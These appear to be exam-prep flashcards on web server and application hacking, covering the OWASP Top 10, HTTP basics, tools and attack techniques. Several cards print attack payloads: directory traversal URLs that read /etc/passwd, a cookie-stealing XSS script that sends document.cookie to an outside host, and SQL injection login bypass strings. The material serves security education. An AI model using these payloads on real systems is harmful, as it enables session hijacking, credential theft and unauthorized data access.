Chapter 6 - Web Based Hacking Servers and Applications Flashcards

1
Q

Web Organizations

Internet Engineering Task Force (IETF)

World Wide Web Consortium (W3C)

Open Web Application Security Project (OWASP)

A

IETF - publishes RFCs. No policy or business, only engineering.

W3C - develops protocols and guidelines to ensure long-term growth of the web. Tries to get vendors to implement core principles and components

OWASP - charitable organization focused on improving security of software. Publishes reports, documents, training efforts to assist in web security

2
Q

OWASP Top 10

A

broad consensus about what the most critical web application security flaws are

A1 - injection flaws
A2 - broken authentication and session management
A3 - Cross-Site Scripting (XSS)
A4 - insecure direct object references
A5 - security misconfiguration
A6 - sensitive data exposure
A7 - missing function level access control
A8 - cross-site request forgery
A9 - using components with known vulnerabilities
A10 - unvalidated redirects and forwards

3
Q

A1

Injection Flaws

A

SQL, OS, LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query

Hostile data can trick interpreter into executing commands or accessing data without authorization

4
Q

A2

Broken Authentication and Session Management

A

can allow attackers to compromise passwords, keys, session tokens or exploit other implementation flaws to assume other users’ identities

5
Q

A3

Cross-Site Scripting (XSS)

A

occurs whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping.

Lets attackers execute scripts in target browser which can hijack user sessions, deface websites or redirect user to malicious website

6
Q

A4

Insecure Direct Object References

A

A direct object reference occurs when developer exposes a reference to an internal implementation object like a file, directory or database key.

Without access control check or other protection, attackers can manipulate these references to access unauthorized data

7
Q

A5

Security Misconfiguration

A

security configurations should be defined and deployed for applications, frameworks, servers and platforms.

defaults are often insecure, so secure settings should be defined and implemented

software should be updated

8
Q

A6

Sensitive Data Exposure

A

Many web applications don’t properly protect sensitive data and authentication credentials

sensitive data deserves extra protection like encryption at rest and transit, and special precautions when exchanged with the browser

9
Q

A7

Missing Function Level Access Control

A

Most web applications verify function level access rights before making that functionality visible in the UI. But applications need to perform the same access control checks on the server when each function is accessed

If requests aren’t verified attackers can forge requests to access functionality without proper authorization

10
Q

A8

Cross-Site Request Forgery (CSRF)

A

CSRF attack forces a logged-on victim’s browser to send a forged HTTP request including the victim’s session cookie and any other automatically included authentication info to a vulnerable web application

This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim

11
Q

A9

Using Components with Known Vulnerabilities

A

Many components are often run with full privileges. If one is exploited, an attack can facilitate serious loss or server takeover.

Applications using components with known vulnerabilities can undermine application defenses and enable a range of attacks and impacts

12
Q

A10

Unvalidated Redirects and Forwards

A

Web applications often redirect and forward users to other pages and websites and use untrusted data to determine the destination pages.

Without proper validation, attackers can redirect victim to phishing or malware sites or use forwards to access unauthorized pages

13
Q

ECC’s 6 Stages of Web Server Attack Methodology

A

information gathering

footprinting

mirroring websites

vulnerability scanning

session hijacking

password cracking

14
Q

web server attack

information gathering and footprinting

A

whois and banner grabbing

Netcraft for high-level info

HTTPRecon, IDServe for identifying web server architecture and OS

HTTPrint

Burp Suite can give insight to content

Black Widow, HTTrack can copy a website to your system for review

15
Q

web server attack

vulnerability scanning

A

Nessus is ok

Nikto is designed for web servers: file problems, script errors, server configuration errors. Can be configured within Nessus to automatically scan when a web server is discovered. Plugins and signatures available

Nikto is not a stealthy tool

16
Q

Web Server Architecture

Steps to request and receive a web page

A

client sends request to server to open TCP port on 80 or 443 (typically)

after agreeing to the handshake on the page request, the server waits for HTTP GET request from the client

HTTP GET request asks for specific HTML code representing a web page

Server looks through storage area, finds code that matches request and sends to client

17
Q

Issues to consider when a client requests a web page

A

does the server validate what client is requesting

does server respond only to verbiage in the request or can it get confused and respond with other actions

where are the actual files of HTML and other code stored. How are their permissions assigned.

etc etc

18
Q

Tier system in network architecture

A

N-tier architecture (aka multi-tier architecture) distributes processes across multiple servers

each tier consists of single role carried out by one or more computer systems (or a cluster)

Typically this is done in 3 Tiers:

presentation
logic
data

19
Q

Apache design and architecture

A

Apache is built modularly with a core and modules to perform variety of functions. Open source so many add-ons available

20
Q

Commonly misconfigured settings on Apache or IIS

A
error messaging (debug logs are useful)
default passwords
SSL certificates
scripts
remote admin functions
config files and services
properly restricting remote administration
eliminating unnecessary services
changing default passwords and accounts
21
Q

HTTP Protocol details

Hypertext Transfer Protocol

A

designed as a request-response Application Layer protocol where client requests hypertext from a server

client requests a resource using its Uniform Resource Indicator (URI) which is typically expressed for web requests as a Uniform Resource Locator (URL)

Server responds to HTTP requests by providing the resource requested

22
Q

HTML Details

A

HTML is a method to mark up hypertext so it will display accordingly in a browser

HTML files consist of tags that tell browser how to display data

<img></img> common ones

24
Q

HTML Entities

A

ways of telling the browser to display those characters it would otherwise look at as a tag or part of the programming itself.

Reserved Character in HTML - HTML Entity Version
nonbreaking space - &nbsp;
" - &quot;
' - &apos;
& - &amp;
< - &lt;
> - &gt;
26
Q

HTTP Request Methods

A

GET - retrieve whatever info is identified by the Request URI. Problem is it was originally designed to send data also, by appending data to the URL

HEAD - identical to GET but server MUST NOT return a message-body in the response. Often used for testing hypertext links for validity, accessibility, modification, requesting headers and metadata

POST - used to request that origin server accept entity in the request as new subordinate of resource identified by Request URI. Better method of submitting data. Primary purpose is to provide data for server. Generally considered safer than GET because admin can set it to not store in browser history or server logs, doesn’t display returned data in the URL

PUT - requests that the enclosed entity be stored under the supplied Request URI. If the Request-URI refers to an existing resource, the enclosed entity should be considered a modified version of it.

DELETE - requests origin server delete resource identified by URI

TRACE - invokes remote application layer loopback of the request message. Final recipient of request should reflect the message received back to the client as the entity body of a 200 (OK) response

CONNECT - reserved for use with proxy that can dynamically switch to being a tunnel (ie SSL tunneling)

27
Q

HTTP Response Messages

First digit defines the class of response

Last two digits don’t have categorization role, but more clearly define the response intent

A

Five Values for first digit

1xx - Informational. Request received. continuing process
2xx - success
3xx - redirection. further action needed to complete request
4xx - client error. request contains bad syntax or can’t be fulfilled
5xx - server error. server failed to fulfill apparently valid request

28
Q

Exam Tip

DNS Amplification

A

DNS Amplification is an attack manipulating recursive DNS to DoS a target

attacker uses botnet to amplify DNS answers to the target until it can’t do anything else

29
Q

Directory Traversal attack

aka dot dot slash (../) attack, directory climbing, backtracking

A

common and successful on older servers

attacker tries to access restricted directories and execute commands outside intended web server directories.

sends HTTP requests asking server to drop back to the root directory and give access to other folders

ex

http: //www.example.com/../../../etc/passwd
http: //www.example.com/../../../Windows\system32\cmd.exe

problem is that it’s noisy. Signature based IDS have many rules looking for this. One workaround is to use unicode in the string to represent dots and slashes.

%2e can represent a dot
%2f can represent a slash

%2e%2e%2f

30
Q

Attack by manipulating the hidden field on the source code of the page

A

HTML code attribute called “hidden” and if it’s there you can view it in the page source code.

Save the page to your computer, alter data and open it in a browser.

Or look for information that is useful

31
Q

Connection String Parameter Pollution (CSPP)

A

injection attack that takes advantage of web applications that talk to databases by using semicolons to separate each parameter

Can be used to steal user identities and hijack web credentials

32
Q

HTTP Attack Tools

Brutus
THC-Hydra
Metasploit

A

Brutus - good for brute-forcing web passwords of HTTP

THC-Hydra - fast network logon cracker

33
Q

Metasploit Framework - 5 Actions

A

select exploit to use

configure options

select target

select payload

launch exploit

34
Q

Attacking Web Applications

ECC definition of web application

A

Web application fills a gap between the website front end and the actual database performing the work

They’re becoming a good attack vector because there are many of them, they aren’t standardized and are often created in-house, so frequently don’t have much security oversight when they’re built

35
Q

Tips for attacking web applications

A

identify entry points:
examine cookies, headers, POST data, encoding and encryption measures. Obviously look at the URL for input parameters and similar

Identify function and technology on the server side to try and learn server makeup, form, function

ex. an aspx file shows the platform. inDate stopDate name can be columns from a database. Error messages and session tokens can provide info

use mirroring to create a local copy for taking your time

36
Q

Injection attacks that aren’t SQL

file injection
command injection
shell injection
LDAP injection
SOAP (Simple Object Access Protocol)
A

file
attacker injects a pointer in the web form input to an exploit hosted on a remote site

command
attacker injects commands into form fields instead of the expected text entry

shell
attacker tries to gain shell access using Java or other functions

LDAP
exploits applications that build LDAP statements based on user input. Exploits non validated web input that passes LDAP queries.

SOAP
inject malicious query strings (like SQL injection) that can allow you to bypass authentication and access databases behind the scenes. SOAP is compatible with HTTP, SMTP and messages are typically one-way

37
Q

Buffer Overflow attacks

A

attempt to write more data into an application’s pre-built buffer in order to overwrite adjacent memory, execute code or crash an application

38
Q

Canary words

A

like the canary in the coal mine

known values placed between the buffer and control data. If a buffer overflow occurs, the canary word is altered first allowing for an orderly stop

ex. Stackguard

Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) are common ways to mitigate buffer overflows.

39
Q

Cross Site Scripting (XSS) attacks

A

attacker takes advantage of scripting language on website (ie when a web form asks for user input, a script dynamically changes appearance or behavior of the site based on the input)

ex.
instead of typing in what you’re supposed to, you type in a script and the server processes it

40
Q

Exam Tip for XSS

know what XSS is, what you can do with it

Recognize that a URL like the following indicates an XSS attack attempt

A

http://IPADDRESS/”;!- -“=&{()}

41
Q

Classic XSS attack

A

gets access to ‘document.cookie’ and sends it to a remote host. Ex. if the app is vulnerable to XSS, this JavaScript will be run and you can get cookies from users accessing the page

<script>
window.open("http://somewhere.com/getcookie.acookie=" + document.cookie)
</script>

42
Q

Things you can do with XSS attacks

include Stored XSS (aka Persistent or Type-I XSS)

A

DoS
send XSS attack over email
store injected script on server (database, message forum, log or comment field)
upload malicious code to users connected to server
get PHP session IDs

43
Q

Cross-Site Request Forgery (CSRF)

A

Forces end user to execute unwanted actions on a web application they’re currently authenticated to

Inherits identity and privileges of the victim

For many sites, browser requests automatically include credentials like user session cookie, IP address, Windows domain credentials, etc

If user is currently authenticated to the site, the site can’t distinguish between forged request and legitimate one

Mitigate CSRF attacks by having web server send random challenge tokens. If every user request includes the token, it’s easy to spot illegitimate requests

44
Q

Cookies

A

Sent in the header of an HTTP response from a web server.

Cookie editor add on for Firefox is useful

Can contain passwords (use Karen’s Cookie Viewer)

Use a Unicode or Base64 decoder to analyze long text strings beside the UserID section

Can be manipulated to use as spyware, change pricing, authenticate to a server, i.e. changing entry from ADMIN=NO to ADMIN=YES

46
Q

SQL encompasses which three standard areas of data handling?

Which one are most SQL injections in?

A

Definition (DDL)

Manipulation (DML)

Control (DCL)

Most SQL injections are in DML

47
Q

SQL Injection

A

when attacker injects SQL queries directly into the input form. When successful the command executes directly on the SQL database

Can inject SQL to a form, or the URL itself
ex. change URL to: www.example.com/?login='OR 1=1--

49
Q

How do you tell if a target is vulnerable to SQL injection?

A

in a web login page, instead of entering what they ask for put in a single quote: '

See what error message you get. If that doesn’t work, put in: anything'or 1=1

and see what you get. If you get a Microsoft OLE error message, it’s most likely vulnerable

Also use the “magic quotes” for Apache and use fuzzing tools like Burp Suite

50
Q

Examples of how to use SQL injection attacks

A

send a SQL command instead of the “forgot your password” response to create (INSERT) a new record into the user and password table

Try logging in using SQL statements like (admin'--) or (admin' /*) or (' or 1=1--)

51
Q

Some names of SQL injection samples

Union Query
Tautology
Blind SQL Injection
Error-based SQL injection

A

Union Query
Lets you join together SELECT queries, for instance combining a harmless query with one that’s malicious.

Tautology
Describes the behavior of the DB system when deciding if a statement is true. Because user IDs and passwords are often compared and a ‘true’ result allows access, if you trick the DB by providing something that’s already true, you can sneak in

Blind SQL Injection
When the attacker knows the database is susceptible to injection but error messages and screen returns don’t come back to him. Much guesswork and trial and error, so it takes a lot of time

Error-based SQL injection
Enumeration technique more than attack. Goal is to enter poorly constructed statements to get DB to respond with table names and other information in its error messages

52
Q

HTTP Response Splitting

A

Add header response data to an input field so server splits response in a couple directions

if it works, attacker controls content of second header which can be used for multiple things, like redirecting user to a controlled site.

OWASP calls this a means to an end, not an end in itself because it’s designed to allow other attacks